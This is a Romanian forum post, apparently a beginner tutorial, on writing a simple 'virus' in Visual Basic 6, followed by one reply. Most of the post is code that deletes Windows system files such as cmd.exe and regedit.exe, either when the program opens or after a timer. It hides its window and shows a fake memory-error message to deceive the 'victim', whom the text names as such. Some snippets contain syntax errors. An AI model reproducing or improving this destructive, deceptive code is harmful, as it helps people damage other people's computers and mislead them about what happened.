Jump to content
edededi

creearea unui virus in VB 6

Recommended Posts

Posted

Acum este foarte greu pt a crea un virus in special pt incepatori. Ei bine, acest "tutorial" iti arata cum poti crea un simplu virus cu doar cateva coduri. Un virus poate fi o aplicatie care sterge FILE din computer, si iti infecteaza computer`ul pt ca iti sterge FILE, CODURI, si iti trebuie Antivirusi ca sa`ti faci computer`ul sa revina la normal.

In primul rand deschide UN NOU PROIECT IN VISUAL BASIC, o STANDARD EXE FILE..

Acum depinde cum vrei tu ca VIRUSUL sa LUCREZE, ma gandesc ca e cel mai bine ca sa activezi o singura data aplicatia deschisa asa ca codurile CODE MAIN`ulului sa fie in ordine.

In proiectul tau baga un TEXT BOX, un buton de comanda si un TIMER, dar vom folosi asea mai tarziu.

In proiect pune FILA care vrei s`o stearga, de ex. daca vrei sa stergi comanda FILEI apoi trebuie sa pui urmatorul cod in ordinea TAB

Private Sub Form_Load()

Text1.Text = "C:/Windows/System32/cmd.exe

Kill Text1.Text

End Sub

O singura data cand programul este deschis THE COMMAND FILE va fi stearsa.

Acum iti voi arata un exemplu de "facere" si a folosi butonu de comanda. Pune urmatorul cod in COMMAND BUTTON si in forma Load`ata.

Poti pune un simplu TEXT BOX pt ca virusul sa fie mai rapid. Eu am pus "A"

Private Sub Form_Load()

Text1.Text = "C/Windows/System32/cmd.exe"

A = Text1.Text

End Sub

Private Sub Command1_Click

Kill A

End Sub

Acum o singura data sa dai click pe COMMAND BUTTON in proiect si FILA pe care ai selectat`o sa fie stearsa va fi stearsa

Acum vom folosi TIMER`ul in asta. Daca vrei ca sa DISGUISE schema ta atunci este un drum bun pt a face`o, aici noi vom trimite un FAKE MESSAGE ERROR pretinzand ca aplicatia n`are destula memorie pt RUN, dar defapt VICTIMA stie ca tu ia`i sters FILA care ai pus`o sa fie stearsa

Aici este o schema:

Private Sub Form_Load()

Form1.Visible = False

Text1.Text = "C:/Windows/System32/cmd.exe"

A = Text1.Text

Msgbox ("Runtime Error 492. Not Enough Memory.", vbCritical, "Runtime Error"

End Sub

Private Sub Timer1_Timer()

Timer1.Interval = 5000

Kill A

Timer1.Enabled = False

End Sub

In sfarsit, am facut o forma invizibila asa ca ii va arata ca ERROR MESSAGE`ul sa fie real. Noi am setat un interval de 5 secunde, adica peste 5 secunde ii sterge FILA & asta e cat de simplu este pt oricine.

Ok, acum il putem face un pic mai dificil daca crezi ca acesta e prea usor !

Cum sa stearga mai mult de 1 FILA din computer, si nuti mai trebuie TEXT BOX, priveste:

In forma LOAD`ata pune urmatorul cod:

Private Sub Form_Load()

Form1.Visible = False

Msgbox ("Runtime Error 492. Not Enough Memory.", vbCritical, "Runtime Error"

Kill "C:/Windows/System32/cmd.exe" s

Kill "C:/Windows/regedit.exe"

End Sub

In fine, se va sterge COMMAND FILE si REGISTRUL, si nu cred ca VICTIMA va fi mai multumita decat tine

Acum iti voi arata informatia care cred ca e inceputul tau pt a crea PROGRAME facute chiar de tine, si acum poti testa pe propiul tau PC, doar copiaza o fila, sa zicem cmd.exe si da paste in C:/

Apoi pune codul, dar in KILL pune asta:

Kill "C:/cmd.exe"

Asta e cam tot ce`ti trebuie pt a "ucide", iar apoi vei vedea FILA care a fost stearsa. Incearca si alte lucruri pt ca am multe sa`ti arat si vei fi un bun programator in nu foarte mult timp

Posted
vedeti numa sa nu va stergeti fisiere importante din pc..

mentionez k comanda "Kill" sterge fisierul de tot... adica NU il muta doar la gunoi ;)

da aveti grija ca este periculos